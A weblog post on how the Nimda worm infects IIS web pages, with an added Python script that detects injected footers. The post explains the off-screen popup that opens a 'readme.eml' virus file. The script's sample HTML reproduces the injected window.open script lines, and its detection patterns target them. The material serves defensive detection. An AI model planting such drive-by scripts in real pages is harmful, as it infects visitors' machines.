monkinetic weblog

Steve Ivy's Weblog - Since 1999 - XII Ed.

Nimda Web Page Exploit Details

Ok, I found an infected site. (I notified the webmaster, who was already aware of the situation. The site is now down.) Anyway, here's the skinny:

Nimda presumably uses IIS's ability to add footers to HTML documents. Once it infects a server running IIS, it appears to add two new lines to the default document ("/", default.[asp,htm]), after the original <html>…</html> element. Each line is another <html> tag containing a single <script> tag. The script opens a new window at coordinates 6000,6000 (way off the screen). The "src" attribute points to the virus file, "readme.eml". If IE is reading the page, it will probably try to open the .eml file (a saved email from Outlook) in the default viewer – Outlook. Doing so will run the virus, and the host will now be infected. Naaaaaasty.
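As an added example (not from the original post), here is a small Python check a webmaster could run over a default document to spot the footer pattern described above: script tags appended after the real closing </html>, opening a window off-screen that points at an .eml file. The sample HTML is constructed to match the description, and the off-screen threshold is an assumption.

```python
import re

# Constructed sample in the shape the post describes: the original page,
# then appended <html><script>...</script></html> lines. This is an
# illustrative stand-in, not a copy of the worm's own payload.
SAMPLE_INFECTED = """<html><head><title>Welcome</title></head>
<body><p>Hello</p></body></html>
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>
"""

# Constructed clean page for comparison.
SAMPLE_CLEAN = "<html><head><title>Welcome</title></head><body><p>Hello</p></body></html>\n"

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
OPEN_RE = re.compile(r"window\.open\s*\(\s*['\"]([^'\"]+)['\"]", re.IGNORECASE)
COORD_RE = re.compile(r"\b(top|left)\s*=\s*(\d+)", re.IGNORECASE)


def trailing_content(html):
    """Everything after the first closing </html>; a clean page has nothing but whitespace here."""
    m = re.search(r"</html\s*>", html, re.IGNORECASE)
    return html[m.end():] if m else ""


def find_footer_injections(html, offscreen=2000):
    """Return one finding per <script> block that appears after the real </html>.

    offscreen is an assumed threshold: window coordinates at or beyond it are
    treated as an attempt to hide the popup from the user.
    """
    findings = []
    for sm in SCRIPT_RE.finditer(trailing_content(html)):
        body = sm.group(1)
        om = OPEN_RE.search(body)
        target = om.group(1) if om else None
        coords = {k.lower(): int(v) for k, v in COORD_RE.findall(body)}
        reasons = ["script after closing </html>"]
        if target and target.lower().endswith(".eml"):
            reasons.append("opens an .eml file")
        if any(v >= offscreen for v in coords.values()):
            reasons.append("window placed off-screen")
        findings.append({"target": target, "coords": coords, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_footer_injections(SAMPLE_INFECTED):
        print(f)
```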

My name is Steve Ivy and I write about technology, the open web, social software, and general nerdity on monkinetic.com. You should follow me on Twitter or subscribe to this blog if you like what you're reading. I spend my days hacking Movable Type, python, Django, and various other efforts at Wallrazer. This is my personal site.